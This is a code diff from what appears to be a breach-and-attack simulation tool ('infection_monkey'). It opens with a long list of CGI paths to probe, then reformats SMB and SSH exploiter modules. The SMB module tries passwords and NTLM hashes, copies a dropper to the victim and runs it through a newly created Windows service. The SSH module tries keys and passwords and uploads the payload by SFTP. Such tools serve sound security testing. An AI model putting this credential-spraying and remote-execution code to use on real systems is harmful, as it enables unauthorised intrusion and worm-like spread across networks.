r'/infosrch.cgi',
r'/login.cgi',
r'/mailview.cgi',
r'/main.cgi',
r'/megabook/admin.cgi',
r'/ministats/admin.cgi',
r'/mods/apage/apage.cgi',
r'/_mt/mt.cgi',
r'/musicqueue.cgi',
r'/ncbook.cgi',
r'/newpro.cgi',
r'/newsletter.sh',
r'/oem_webstage/cgi-bin/oemapp_cgi',
r'/page.cgi',
r'/parse_xml.cgi',
r'/photodata/manage.cgi',
r'/photo/manage.cgi',
r'/print.cgi',
r'/process_buff.cgi',
r'/process_bug.cgi',
r'/pub/english.cgi',
r'/quikmail/nph-emumail.cgi',
r'/quikstore.cgi',
r'/reviews/newpro.cgi',
r'/ROADS/cgi-bin/search.pl',
r'/sample01.cgi',
r'/sample02.cgi',
r'/sample03.cgi',
r'/sample04.cgi',
r'/sampleposteddata.cgi',
r'/scancfg.cgi',
r'/scancfg.cgi',
r'/servers/link.cgi',
r'/setpasswd.cgi',
r'/SetSecurity.shm',
r'/shop/member_html.cgi',
r'/shop/normal_html.cgi',
r'/site_searcher.cgi',
r'/siteUserMod.cgi',
r'/submit.cgi',
r'/technote/print.cgi',
r'/template.cgi',
r'/test.cgi',
r'/ucsm/isSamInstalled.cgi',
r'/upload.cgi',
r'/userreg.cgi',
r'/users/scripts/submit.cgi',
r'/vood/cgi-bin/vood_view.cgi',
r'/Web_Store/web_store.cgi',
r'/webtools/bonsai/ccvsblame.cgi',
r'/webtools/bonsai/cvsblame.cgi',
r'/webtools/bonsai/cvslog.cgi',
r'/webtools/bonsai/cvsquery.cgi',
r'/webtools/bonsai/cvsqueryform.cgi',
r'/webtools/bonsai/showcheckins.cgi',
r'/wwwadmin.cgi',
r'/wwwboard.cgi',
r'/wwwboard/wwwboard.cgi'
r"/",
r"/admin.cgi",
r"/administrator.cgi",
r"/agora.cgi",
r"/aktivate/cgi-bin/catgy.cgi",
r"/analyse.cgi",
r"/apps/web/vs_diag.cgi",
r"/axis-cgi/buffer/command.cgi",
r"/b2-include/b2edit.showposts.php",
r"/bandwidth/index.cgi",
r"/bigconf.cgi",
r"/cartcart.cgi",
r"/cart.cgi",
r"/ccbill/whereami.cgi",
r"/cgi-bin/14all-1.1.cgi",
r"/cgi-bin/14all.cgi",
r"/cgi-bin/a1disp3.cgi",
r"/cgi-bin/a1stats/a1disp3.cgi",
r"/cgi-bin/a1stats/a1disp4.cgi",
r"/cgi-bin/addbanner.cgi",
r"/cgi-bin/add_ftp.cgi",
r"/cgi-bin/adduser.cgi",
r"/cgi-bin/admin/admin.cgi",
r"/cgi-bin/admin.cgi",
r"/cgi-bin/admin/getparam.cgi",
r"/cgi-bin/adminhot.cgi",
r"/cgi-bin/admin.pl",
r"/cgi-bin/admin/setup.cgi",
r"/cgi-bin/adminwww.cgi",
r"/cgi-bin/af.cgi",
r"/cgi-bin/aglimpse.cgi",
r"/cgi-bin/alienform.cgi",
r"/cgi-bin/AnyBoard.cgi",
r"/cgi-bin/architext_query.cgi",
r"/cgi-bin/astrocam.cgi",
r"/cgi-bin/AT-admin.cgi",
r"/cgi-bin/AT-generate.cgi",
r"/cgi-bin/auction/auction.cgi",
r"/cgi-bin/auktion.cgi",
r"/cgi-bin/ax-admin.cgi",
r"/cgi-bin/ax.cgi",
r"/cgi-bin/axs.cgi",
r"/cgi-bin/badmin.cgi",
r"/cgi-bin/banner.cgi",
r"/cgi-bin/bannereditor.cgi",
r"/cgi-bin/bb-ack.sh",
r"/cgi-bin/bb-histlog.sh",
r"/cgi-bin/bb-hist.sh",
r"/cgi-bin/bb-hostsvc.sh",
r"/cgi-bin/bb-replog.sh",
r"/cgi-bin/bb-rep.sh",
r"/cgi-bin/bbs_forum.cgi",
r"/cgi-bin/bigconf.cgi",
r"/cgi-bin/bizdb1-search.cgi",
r"/cgi-bin/blog/mt-check.cgi",
r"/cgi-bin/blog/mt-load.cgi",
r"/cgi-bin/bnbform.cgi",
r"/cgi-bin/book.cgi",
r"/cgi-bin/boozt/admin/index.cgi",
r"/cgi-bin/bsguest.cgi",
r"/cgi-bin/bslist.cgi",
r"/cgi-bin/build.cgi",
r"/cgi-bin/bulk/bulk.cgi",
r"/cgi-bin/cached_feed.cgi",
r"/cgi-bin/cachemgr.cgi",
r"/cgi-bin/calendar/index.cgi",
r"/cgi-bin/cartmanager.cgi",
r"/cgi-bin/cbmc/forums.cgi",
r"/cgi-bin/ccvsblame.cgi",
r"/cgi-bin/c_download.cgi",
r"/cgi-bin/cgforum.cgi",
r"/cgi-bin/.cgi",
r"/cgi-bin/cgi_process",
r"/cgi-bin/classified.cgi",
r"/cgi-bin/classifieds.cgi",
r"/cgi-bin/classifieds/classifieds.cgi",
r"/cgi-bin/classifieds/index.cgi",
r"/cgi-bin/.cobalt/alert/service.cgi",
r"/cgi-bin/.cobalt/message/message.cgi",
r"/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi",
r"/cgi-bin/commandit.cgi",
r"/cgi-bin/commerce.cgi",
r"/cgi-bin/common/listrec.pl",
r"/cgi-bin/compatible.cgi",
r"/cgi-bin/Count.cgi",
r"/cgi-bin/csChatRBox.cgi",
r"/cgi-bin/csGuestBook.cgi",
r"/cgi-bin/csLiveSupport.cgi",
r"/cgi-bin/CSMailto.cgi",
r"/cgi-bin/CSMailto/CSMailto.cgi",
r"/cgi-bin/csNews.cgi",
r"/cgi-bin/csNewsPro.cgi",
r"/cgi-bin/csPassword.cgi",
r"/cgi-bin/csPassword/csPassword.cgi",
r"/cgi-bin/csSearch.cgi",
r"/cgi-bin/csv_db.cgi",
r"/cgi-bin/cvsblame.cgi",
r"/cgi-bin/cvslog.cgi",
r"/cgi-bin/cvsquery.cgi",
r"/cgi-bin/cvsqueryform.cgi",
r"/cgi-bin/day5datacopier.cgi",
r"/cgi-bin/day5datanotifier.cgi",
r"/cgi-bin/db_manager.cgi",
r"/cgi-bin/dbman/db.cgi",
r"/cgi-bin/dcforum.cgi",
r"/cgi-bin/dcshop.cgi",
r"/cgi-bin/dfire.cgi",
r"/cgi-bin/diagnose.cgi",
r"/cgi-bin/dig.cgi",
r"/cgi-bin/directorypro.cgi",
r"/cgi-bin/download.cgi",
r"/cgi-bin/e87_Ba79yo87.cgi",
r"/cgi-bin/emu/html/emumail.cgi",
r"/cgi-bin/emumail.cgi",
r"/cgi-bin/emumail/emumail.cgi",
r"/cgi-bin/enter.cgi",
r"/cgi-bin/environ.cgi",
r"/cgi-bin/ezadmin.cgi",
r"/cgi-bin/ezboard.cgi",
r"/cgi-bin/ezman.cgi",
r"/cgi-bin/ezshopper2/loadpage.cgi",
r"/cgi-bin/ezshopper3/loadpage.cgi",
r"/cgi-bin/ezshopper/loadpage.cgi",
r"/cgi-bin/ezshopper/search.cgi",
r"/cgi-bin/faqmanager.cgi",
r"/cgi-bin/FileSeek2.cgi",
r"/cgi-bin/FileSeek.cgi",
r"/cgi-bin/finger.cgi",
r"/cgi-bin/flexform.cgi",
r"/cgi-bin/fom.cgi",
r"/cgi-bin/fom/fom.cgi",
r"/cgi-bin/FormHandler.cgi",
r"/cgi-bin/FormMail.cgi",
r"/cgi-bin/gbadmin.cgi",
r"/cgi-bin/gbook/gbook.cgi",
r"/cgi-bin/generate.cgi",
r"/cgi-bin/getdoc.cgi",
r"/cgi-bin/gH.cgi",
r"/cgi-bin/gm-authors.cgi",
r"/cgi-bin/gm.cgi",
r"/cgi-bin/gm-cplog.cgi",
r"/cgi-bin/guestbook.cgi",
r"/cgi-bin/handler",
r"/cgi-bin/handler.cgi",
r"/cgi-bin/handler/netsonar",
r"/cgi-bin/hitview.cgi",
r"/cgi-bin/hsx.cgi",
r"/cgi-bin/html2chtml.cgi",
r"/cgi-bin/html2wml.cgi",
r"/cgi-bin/htsearch.cgi",
r"/cgi-bin/hw.sh", # testing
r"/cgi-bin/icat",
r"/cgi-bin/if/admin/nph-build.cgi",
r"/cgi-bin/ikonboard/help.cgi",
r"/cgi-bin/ImageFolio/admin/admin.cgi",
r"/cgi-bin/imageFolio.cgi",
r"/cgi-bin/index.cgi",
r"/cgi-bin/infosrch.cgi",
r"/cgi-bin/jammail.pl",
r"/cgi-bin/journal.cgi",
r"/cgi-bin/lastlines.cgi",
r"/cgi-bin/loadpage.cgi",
r"/cgi-bin/login.cgi",
r"/cgi-bin/logit.cgi",
r"/cgi-bin/log-reader.cgi",
r"/cgi-bin/lookwho.cgi",
r"/cgi-bin/lwgate.cgi",
r"/cgi-bin/MachineInfo",
r"/cgi-bin/MachineInfo",
r"/cgi-bin/magiccard.cgi",
r"/cgi-bin/mail/emumail.cgi",
r"/cgi-bin/maillist.cgi",
r"/cgi-bin/mailnews.cgi",
r"/cgi-bin/mail/nph-mr.cgi",
r"/cgi-bin/main.cgi",
r"/cgi-bin/main_menu.pl",
r"/cgi-bin/man.sh",
r"/cgi-bin/mini_logger.cgi",
r"/cgi-bin/mmstdod.cgi",
r"/cgi-bin/moin.cgi",
r"/cgi-bin/mojo/mojo.cgi",
r"/cgi-bin/mrtg.cgi",
r"/cgi-bin/mt.cgi",
r"/cgi-bin/mt/mt.cgi",
r"/cgi-bin/mt/mt-check.cgi",
r"/cgi-bin/mt/mt-load.cgi",
r"/cgi-bin/mt-static/mt-check.cgi",
r"/cgi-bin/mt-static/mt-load.cgi",
r"/cgi-bin/musicqueue.cgi",
r"/cgi-bin/myguestbook.cgi",
r"/cgi-bin/.namazu.cgi",
r"/cgi-bin/nbmember.cgi",
r"/cgi-bin/netauth.cgi",
r"/cgi-bin/netpad.cgi",
r"/cgi-bin/newsdesk.cgi",
r"/cgi-bin/nlog-smb.cgi",
r"/cgi-bin/nph-emumail.cgi",
r"/cgi-bin/nph-exploitscanget.cgi",
r"/cgi-bin/nph-publish.cgi",
r"/cgi-bin/nph-test.cgi",
r"/cgi-bin/pagelog.cgi",
r"/cgi-bin/pbcgi.cgi",
r"/cgi-bin/perlshop.cgi",
r"/cgi-bin/pfdispaly.cgi",
r"/cgi-bin/pfdisplay.cgi",
r"/cgi-bin/phf.cgi",
r"/cgi-bin/photo/manage.cgi",
r"/cgi-bin/photo/protected/manage.cgi",
r"/cgi-bin/php-cgi",
r"/cgi-bin/php.cgi",
r"/cgi-bin/php.fcgi",
r"/cgi-bin/ping.sh",
r"/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi",
r"/cgi-bin/pollssi.cgi",
r"/cgi-bin/postcards.cgi",
r"/cgi-bin/powerup/r.cgi",
r"/cgi-bin/printenv",
r"/cgi-bin/probecontrol.cgi",
r"/cgi-bin/profile.cgi",
r"/cgi-bin/publisher/search.cgi",
r"/cgi-bin/quickstore.cgi",
r"/cgi-bin/quizme.cgi",
r"/cgi-bin/ratlog.cgi",
r"/cgi-bin/r.cgi",
r"/cgi-bin/register.cgi",
r"/cgi-bin/replicator/webpage.cgi/",
r"/cgi-bin/responder.cgi",
r"/cgi-bin/robadmin.cgi",
r"/cgi-bin/robpoll.cgi",
r"/cgi-bin/rtpd.cgi",
r"/cgi-bin/sbcgi/sitebuilder.cgi",
r"/cgi-bin/scoadminreg.cgi",
r"/cgi-bin-sdb/printenv",
r"/cgi-bin/sdbsearch.cgi",
r"/cgi-bin/search",
r"/cgi-bin/search.cgi",
r"/cgi-bin/search/search.cgi",
r"/cgi-bin/sendform.cgi",
r"/cgi-bin/shop.cgi",
r"/cgi-bin/shopper.cgi",
r"/cgi-bin/shopplus.cgi",
r"/cgi-bin/showcheckins.cgi",
r"/cgi-bin/simplestguest.cgi",
r"/cgi-bin/simplestmail.cgi",
r"/cgi-bin/smartsearch.cgi",
r"/cgi-bin/smartsearch/smartsearch.cgi",
r"/cgi-bin/snorkerz.bat",
r"/cgi-bin/snorkerz.bat",
r"/cgi-bin/snorkerz.cmd",
r"/cgi-bin/snorkerz.cmd",
r"/cgi-bin/sojourn.cgi",
r"/cgi-bin/spin_client.cgi",
r"/cgi-bin/start.cgi",
r"/cgi-bin/status",
r"/cgi-bin/status_cgi",
r"/cgi-bin/store/agora.cgi",
r"/cgi-bin/store.cgi",
r"/cgi-bin/store/index.cgi",
r"/cgi-bin/survey.cgi",
r"/cgi-bin/sync.cgi",
r"/cgi-bin/talkback.cgi",
r"/cgi-bin/technote/main.cgi",
r"/cgi-bin/test2.pl",
r"/cgi-bin/test-cgi",
r"/cgi-bin/test.cgi",
r"/cgi-bin/testing_whatever",
r"/cgi-bin/test/test.cgi",
r"/cgi-bin/tidfinder.cgi",
r"/cgi-bin/tigvote.cgi",
r"/cgi-bin/title.cgi",
r"/cgi-bin/top.cgi",
r"/cgi-bin/traffic.cgi",
r"/cgi-bin/troops.cgi",
r"/cgi-bin/ttawebtop.cgi/",
r"/cgi-bin/ultraboard.cgi",
r"/cgi-bin/upload.cgi",
r"/cgi-bin/urlcount.cgi",
r"/cgi-bin/viewcvs.cgi",
r"/cgi-bin/view_help.cgi",
r"/cgi-bin/viralator.cgi",
r"/cgi-bin/virgil.cgi",
r"/cgi-bin/vote.cgi",
r"/cgi-bin/vpasswd.cgi",
r"/cgi-bin/way-board.cgi",
r"/cgi-bin/way-board/way-board.cgi",
r"/cgi-bin/webbbs.cgi",
r"/cgi-bin/webcart/webcart.cgi",
r"/cgi-bin/webdist.cgi",
r"/cgi-bin/webif.cgi",
r"/cgi-bin/webmail/html/emumail.cgi",
r"/cgi-bin/webmap.cgi",
r"/cgi-bin/webspirs.cgi",
r"/cgi-bin/Web_Store/web_store.cgi",
r"/cgi-bin/whois.cgi",
r"/cgi-bin/whois_raw.cgi",
r"/cgi-bin/whois/whois.cgi",
r"/cgi-bin/wrap",
r"/cgi-bin/wrap.cgi",
r"/cgi-bin/wwwboard.cgi.cgi",
r"/cgi-bin/YaBB/YaBB.cgi",
r"/cgi-bin/zml.cgi",
r"/cgi-mod/index.cgi",
r"/cgis/wwwboard/wwwboard.cgi",
r"/cgi-sys/addalink.cgi",
r"/cgi-sys/defaultwebpage.cgi",
r"/cgi-sys/domainredirect.cgi",
r"/cgi-sys/entropybanner.cgi",
r"/cgi-sys/entropysearch.cgi",
r"/cgi-sys/FormMail-clone.cgi",
r"/cgi-sys/helpdesk.cgi",
r"/cgi-sys/mchat.cgi",
r"/cgi-sys/randhtml.cgi",
r"/cgi-sys/realhelpdesk.cgi",
r"/cgi-sys/realsignup.cgi",
r"/cgi-sys/signup.cgi",
r"/connector.cgi",
r"/cp/rac/nsManager.cgi",
r"/create_release.sh",
r"/CSNews.cgi",
r"/csPassword.cgi",
r"/dcadmin.cgi",
r"/dcboard.cgi",
r"/dcforum.cgi",
r"/dcforum/dcforum.cgi",
r"/debuff.cgi",
r"/debug.cgi",
r"/details.cgi",
r"/edittag/edittag.cgi",
r"/emumail.cgi",
r"/enter_buff.cgi",
r"/enter_bug.cgi",
r"/ez2000/ezadmin.cgi",
r"/ez2000/ezboard.cgi",
r"/ez2000/ezman.cgi",
r"/fcgi-bin/echo",
r"/fcgi-bin/echo",
r"/fcgi-bin/echo2",
r"/fcgi-bin/echo2",
r"/Gozila.cgi",
r"/hitmatic/analyse.cgi",
r"/hp_docs/cgi-bin/index.cgi",
r"/html/cgi-bin/cgicso",
r"/html/cgi-bin/cgicso",
r"/index.cgi",
r"/info.cgi",
r"/infosrch.cgi",
r"/login.cgi",
r"/mailview.cgi",
r"/main.cgi",
r"/megabook/admin.cgi",
r"/ministats/admin.cgi",
r"/mods/apage/apage.cgi",
r"/_mt/mt.cgi",
r"/musicqueue.cgi",
r"/ncbook.cgi",
r"/newpro.cgi",
r"/newsletter.sh",
r"/oem_webstage/cgi-bin/oemapp_cgi",
r"/page.cgi",
r"/parse_xml.cgi",
r"/photodata/manage.cgi",
r"/photo/manage.cgi",
r"/print.cgi",
r"/process_buff.cgi",
r"/process_bug.cgi",
r"/pub/english.cgi",
r"/quikmail/nph-emumail.cgi",
r"/quikstore.cgi",
r"/reviews/newpro.cgi",
r"/ROADS/cgi-bin/search.pl",
r"/sample01.cgi",
r"/sample02.cgi",
r"/sample03.cgi",
r"/sample04.cgi",
r"/sampleposteddata.cgi",
r"/scancfg.cgi",
r"/scancfg.cgi",
r"/servers/link.cgi",
r"/setpasswd.cgi",
r"/SetSecurity.shm",
r"/shop/member_html.cgi",
r"/shop/normal_html.cgi",
r"/site_searcher.cgi",
r"/siteUserMod.cgi",
r"/submit.cgi",
r"/technote/print.cgi",
r"/template.cgi",
r"/test.cgi",
r"/ucsm/isSamInstalled.cgi",
r"/upload.cgi",
r"/userreg.cgi",
r"/users/scripts/submit.cgi",
r"/vood/cgi-bin/vood_view.cgi",
r"/Web_Store/web_store.cgi",
r"/webtools/bonsai/ccvsblame.cgi",
r"/webtools/bonsai/cvsblame.cgi",
r"/webtools/bonsai/cvslog.cgi",
r"/webtools/bonsai/cvsquery.cgi",
r"/webtools/bonsai/cvsqueryform.cgi",
r"/webtools/bonsai/showcheckins.cgi",
r"/wwwadmin.cgi",
r"/wwwboard.cgi",
r"/wwwboard/wwwboard.cgi",
)

View File

@ -5,10 +5,13 @@ from impacket.dcerpc.v5 import scmr, transport
from common.utils.attack_utils import ScanStatus, UsageEnum
from common.utils.exploit_enum import ExploitType
from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth, get_target_monkey
from infection_monkey.exploit.tools.helpers import (
build_monkey_commandline,
get_monkey_depth,
get_target_monkey,
)
from infection_monkey.exploit.tools.smb_tools import SmbTools
from infection_monkey.model import (DROPPER_CMDLINE_DETACHED_WINDOWS,
MONKEY_CMDLINE_DETACHED_WINDOWS)
from infection_monkey.model import DROPPER_CMDLINE_DETACHED_WINDOWS, MONKEY_CMDLINE_DETACHED_WINDOWS
from infection_monkey.network.smbfinger import SMBFinger
from infection_monkey.network.tools import check_tcp_port
from infection_monkey.telemetry.attack.t1035_telem import T1035Telem
@ -17,12 +20,12 @@ LOG = getLogger(__name__)
class SmbExploiter(HostExploiter):
_TARGET_OS_TYPE = ['windows']
_TARGET_OS_TYPE = ["windows"]
EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
_EXPLOITED_SERVICE = 'SMB'
_EXPLOITED_SERVICE = "SMB"
KNOWN_PROTOCOLS = {
'139/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 139),
'445/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 445),
"139/SMB": (r"ncacn_np:%s[\pipe\svcctl]", 139),
"445/SMB": (r"ncacn_np:%s[\pipe\svcctl]", 445),
}
USE_KERBEROS = False
@ -34,7 +37,7 @@ class SmbExploiter(HostExploiter):
if super(SmbExploiter, self).is_os_supported():
return True
if not self.host.os.get('type'):
if not self.host.os.get("type"):
is_smb_open, _ = check_tcp_port(self.host.ip_addr, 445)
if is_smb_open:
smb_finger = SMBFinger()
@ -42,8 +45,8 @@ class SmbExploiter(HostExploiter):
else:
is_nb_open, _ = check_tcp_port(self.host.ip_addr, 139)
if is_nb_open:
self.host.os['type'] = 'windows'
return self.host.os.get('type') in self._TARGET_OS_TYPE
self.host.os["type"] = "windows"
return self.host.os.get("type") in self._TARGET_OS_TYPE
return False
def _exploit_host(self):
@ -59,25 +62,34 @@ class SmbExploiter(HostExploiter):
for user, password, lm_hash, ntlm_hash in creds:
try:
# copy the file remotely using SMB
remote_full_path = SmbTools.copy_file(self.host,
remote_full_path = SmbTools.copy_file(
self.host,
src_path,
self._config.dropper_target_path_win_32,
user,
password,
lm_hash,
ntlm_hash,
self._config.smb_download_timeout)
self._config.smb_download_timeout,
)
if remote_full_path is not None:
LOG.debug("Successfully logged in %r using SMB (%s : (SHA-512) %s : (SHA-512) %s : (SHA-512) %s)",
LOG.debug(
"Successfully logged in %r using SMB (%s : (SHA-512) %s : (SHA-512) %s : (SHA-512) %s)",
self.host,
user,
self._config.hash_sensitive_data(password),
self._config.hash_sensitive_data(lm_hash),
self._config.hash_sensitive_data(ntlm_hash))
self._config.hash_sensitive_data(ntlm_hash),
)
self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)
self.add_vuln_port("%s or %s" % (SmbExploiter.KNOWN_PROTOCOLS['139/SMB'][1],
SmbExploiter.KNOWN_PROTOCOLS['445/SMB'][1]))
self.add_vuln_port(
"%s or %s"
% (
SmbExploiter.KNOWN_PROTOCOLS["139/SMB"][1],
SmbExploiter.KNOWN_PROTOCOLS["445/SMB"][1],
)
)
exploited = True
break
else:
@ -93,7 +105,8 @@ class SmbExploiter(HostExploiter):
self._config.hash_sensitive_data(password),
self._config.hash_sensitive_data(lm_hash),
self._config.hash_sensitive_data(ntlm_hash),
exc)
exc,
)
continue
if not exploited:
@ -103,24 +116,29 @@ class SmbExploiter(HostExploiter):
self.set_vulnerable_port()
# execute the remote dropper in case the path isn't final
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {'dropper_path': remote_full_path} + \
build_monkey_commandline(self.host, get_monkey_depth() - 1,
self.vulnerable_port,
self._config.dropper_target_path_win_32)
else:
cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {'monkey_path': remote_full_path} + \
build_monkey_commandline(self.host,
cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {
"dropper_path": remote_full_path
} + build_monkey_commandline(
self.host,
get_monkey_depth() - 1,
vulnerable_port=self.vulnerable_port)
self.vulnerable_port,
self._config.dropper_target_path_win_32,
)
else:
cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {
"monkey_path": remote_full_path
} + build_monkey_commandline(
self.host, get_monkey_depth() - 1, vulnerable_port=self.vulnerable_port
)
smb_conn = False
for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values():
rpctransport = transport.DCERPCTransportFactory(str_bind_format % (self.host.ip_addr,))
rpctransport.set_dport(port)
rpctransport.setRemoteHost(self.host.ip_addr)
if hasattr(rpctransport, 'set_credentials'):
if hasattr(rpctransport, "set_credentials"):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(user, password, '', lm_hash, ntlm_hash, None)
rpctransport.set_credentials(user, password, "", lm_hash, ntlm_hash, None)
rpctransport.set_kerberos(SmbExploiter.USE_KERBEROS)
scmr_rpc = rpctransport.get_dce_rpc()
@ -128,7 +146,12 @@ class SmbExploiter(HostExploiter):
try:
scmr_rpc.connect()
except Exception as exc:
LOG.debug("Can't connect to SCM on exploited machine %r port %s : %s", self.host, port, exc)
LOG.debug(
"Can't connect to SCM on exploited machine %r port %s : %s",
self.host,
port,
exc,
)
continue
smb_conn = rpctransport.get_smb_connection()
@ -140,12 +163,17 @@ class SmbExploiter(HostExploiter):
smb_conn.setTimeout(100000)
scmr_rpc.bind(scmr.MSRPC_UUID_SCMR)
resp = scmr.hROpenSCManagerW(scmr_rpc)
sc_handle = resp['lpScHandle']
sc_handle = resp["lpScHandle"]
# start the monkey using the SCM
resp = scmr.hRCreateServiceW(scmr_rpc, sc_handle, self._config.smb_service_name, self._config.smb_service_name,
lpBinaryPathName=cmdline)
service = resp['lpServiceHandle']
resp = scmr.hRCreateServiceW(
scmr_rpc,
sc_handle,
self._config.smb_service_name,
self._config.smb_service_name,
lpBinaryPathName=cmdline,
)
service = resp["lpServiceHandle"]
try:
scmr.hRStartServiceW(scmr_rpc, service)
status = ScanStatus.USED
@ -156,17 +184,26 @@ class SmbExploiter(HostExploiter):
scmr.hRDeleteService(scmr_rpc, service)
scmr.hRCloseServiceHandle(scmr_rpc, service)
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
remote_full_path, self.host, cmdline)
LOG.info(
"Executed monkey '%s' on remote victim %r (cmdline=%r)",
remote_full_path,
self.host,
cmdline,
)
self.add_vuln_port("%s or %s" % (SmbExploiter.KNOWN_PROTOCOLS['139/SMB'][1],
SmbExploiter.KNOWN_PROTOCOLS['445/SMB'][1]))
self.add_vuln_port(
"%s or %s"
% (
SmbExploiter.KNOWN_PROTOCOLS["139/SMB"][1],
SmbExploiter.KNOWN_PROTOCOLS["445/SMB"][1],
)
)
return True
def set_vulnerable_port(self):
if 'tcp-445' in self.host.services:
if "tcp-445" in self.host.services:
self.vulnerable_port = "445"
elif 'tcp-139' in self.host.services:
elif "tcp-139" in self.host.services:
self.vulnerable_port = "139"
else:
self.vulnerable_port = None

View File

@ -9,13 +9,17 @@ from common.utils.attack_utils import ScanStatus
from common.utils.exceptions import FailedExploitationError
from common.utils.exploit_enum import ExploitType
from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth, get_target_monkey
from infection_monkey.exploit.tools.helpers import (
build_monkey_commandline,
get_monkey_depth,
get_target_monkey,
)
from infection_monkey.model import MONKEY_ARG
from infection_monkey.network.tools import check_tcp_port, get_interface_to_target
from infection_monkey.telemetry.attack.t1105_telem import T1105Telem
from infection_monkey.telemetry.attack.t1222_telem import T1222Telem
__author__ = 'hoffer'
__author__ = "hoffer"
LOG = logging.getLogger(__name__)
SSH_PORT = 22
@ -23,9 +27,9 @@ TRANSFER_UPDATE_RATE = 15
class SSHExploiter(HostExploiter):
_TARGET_OS_TYPE = ['linux', None]
_TARGET_OS_TYPE = ["linux", None]
EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
_EXPLOITED_SERVICE = 'SSH'
_EXPLOITED_SERVICE = "SSH"
def __init__(self, host):
super(SSHExploiter, self).__init__(host)
@ -42,8 +46,8 @@ class SSHExploiter(HostExploiter):
for user, ssh_key_pair in user_ssh_key_pairs:
# Creating file-like private key for paramiko
pkey = io.StringIO(ssh_key_pair['private_key'])
ssh_string = "%s@%s" % (ssh_key_pair['user'], ssh_key_pair['ip'])
pkey = io.StringIO(ssh_key_pair["private_key"])
ssh_string = "%s@%s" % (ssh_key_pair["user"], ssh_key_pair["ip"])
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
@ -52,19 +56,17 @@ class SSHExploiter(HostExploiter):
except (IOError, paramiko.SSHException, paramiko.PasswordRequiredException):
LOG.error("Failed reading ssh key")
try:
ssh.connect(self.host.ip_addr,
username=user,
pkey=pkey,
port=port)
LOG.debug("Successfully logged in %s using %s users private key",
self.host, ssh_string)
ssh.connect(self.host.ip_addr, username=user, pkey=pkey, port=port)
LOG.debug(
"Successfully logged in %s using %s users private key", self.host, ssh_string
)
self.report_login_attempt(True, user, ssh_key=ssh_string)
return ssh
except Exception:
ssh.close()
LOG.debug("Error logging into victim %r with %s"
" private key", self.host,
ssh_string)
LOG.debug(
"Error logging into victim %r with %s" " private key", self.host, ssh_string
)
self.report_login_attempt(False, user, ssh_key=ssh_string)
continue
raise FailedExploitationError
@ -77,21 +79,27 @@ class SSHExploiter(HostExploiter):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
try:
ssh.connect(self.host.ip_addr,
username=user,
password=current_password,
port=port)
ssh.connect(self.host.ip_addr, username=user, password=current_password, port=port)
LOG.debug("Successfully logged in %r using SSH. User: %s, pass (SHA-512): %s)",
self.host, user, self._config.hash_sensitive_data(current_password))
LOG.debug(
"Successfully logged in %r using SSH. User: %s, pass (SHA-512): %s)",
self.host,
user,
self._config.hash_sensitive_data(current_password),
)
self.add_vuln_port(port)
self.report_login_attempt(True, user, current_password)
return ssh
except Exception as exc:
LOG.debug("Error logging into victim %r with user"
" %s and password (SHA-512) '%s': (%s)", self.host,
user, self._config.hash_sensitive_data(current_password), exc)
LOG.debug(
"Error logging into victim %r with user"
" %s and password (SHA-512) '%s': (%s)",
self.host,
user,
self._config.hash_sensitive_data(current_password),
exc,
)
self.report_login_attempt(False, user, current_password)
ssh.close()
continue
@ -102,8 +110,8 @@ class SSHExploiter(HostExploiter):
port = SSH_PORT
# if ssh banner found on different port, use that port.
for servkey, servdata in list(self.host.services.items()):
if servdata.get('name') == 'ssh' and servkey.startswith('tcp-'):
port = int(servkey.replace('tcp-', ''))
if servdata.get("name") == "ssh" and servkey.startswith("tcp-"):
port = int(servkey.replace("tcp-", ""))
is_open, _ = check_tcp_port(self.host.ip_addr, port)
if not is_open:
@ -119,12 +127,12 @@ class SSHExploiter(HostExploiter):
LOG.debug("Exploiter SSHExploiter is giving up...")
return False
if not self.host.os.get('type'):
if not self.host.os.get("type"):
try:
_, stdout, _ = ssh.exec_command('uname -o')
_, stdout, _ = ssh.exec_command("uname -o")
uname_os = stdout.read().lower().strip().decode()
if 'linux' in uname_os:
self.host.os['type'] = 'linux'
if "linux" in uname_os:
self.host.os["type"] = "linux"
else:
LOG.info("SSH Skipping unknown os: %s", uname_os)
return False
@ -132,21 +140,25 @@ class SSHExploiter(HostExploiter):
LOG.debug("Error running uname os command on victim %r: (%s)", self.host, exc)
return False
if not self.host.os.get('machine'):
if not self.host.os.get("machine"):
try:
_, stdout, _ = ssh.exec_command('uname -m')
_, stdout, _ = ssh.exec_command("uname -m")
uname_machine = stdout.read().lower().strip().decode()
if '' != uname_machine:
self.host.os['machine'] = uname_machine
if "" != uname_machine:
self.host.os["machine"] = uname_machine
except Exception as exc:
LOG.debug("Error running uname machine command on victim %r: (%s)", self.host, exc)
if self.skip_exist:
_, stdout, stderr = ssh.exec_command("head -c 1 %s" % self._config.dropper_target_path_linux)
_, stdout, stderr = ssh.exec_command(
"head -c 1 %s" % self._config.dropper_target_path_linux
)
stdout_res = stdout.read().strip()
if stdout_res:
# file exists
LOG.info("Host %s was already infected under the current configuration, done" % self.host)
LOG.info(
"Host %s was already infected under the current configuration, done" % self.host
)
return True # return already infected
src_path = get_target_monkey(self.host)
@ -160,33 +172,44 @@ class SSHExploiter(HostExploiter):
self._update_timestamp = time.time()
with monkeyfs.open(src_path) as file_obj:
ftp.putfo(file_obj, self._config.dropper_target_path_linux, file_size=monkeyfs.getsize(src_path),
callback=self.log_transfer)
